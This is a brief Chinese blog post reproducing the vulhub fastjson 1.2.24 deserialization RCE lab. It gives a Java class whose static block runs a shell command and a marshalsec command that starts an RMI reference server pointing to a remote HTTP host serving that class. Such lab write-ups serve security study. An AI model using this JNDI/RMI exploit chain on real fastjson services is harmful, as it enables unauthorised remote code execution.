文章

Java Unserialize

发表于
作者 Leo 1 分钟阅读

https://vulhub.org/#/environments/fastjson/1.2.24-rce/

玩玩这个漏洞

alt text

借助项目

https://github.com/mbechler/marshalsec.git

alt text

获取Jar

alt text

编译成功

alt text

Demo.class

alt text

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;

public class Demo {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"touch", "/tmp/success"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

运行rmi程序

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.31.241:1234/#Demo" 9999

alt text

alt text

alt text

一定要注意版本问题

java 版本和 javac 版本一定要一致,不然会出现问题

alt text

应该使用第二个javac

本文由作者按照 CC BY 4.0 进行授权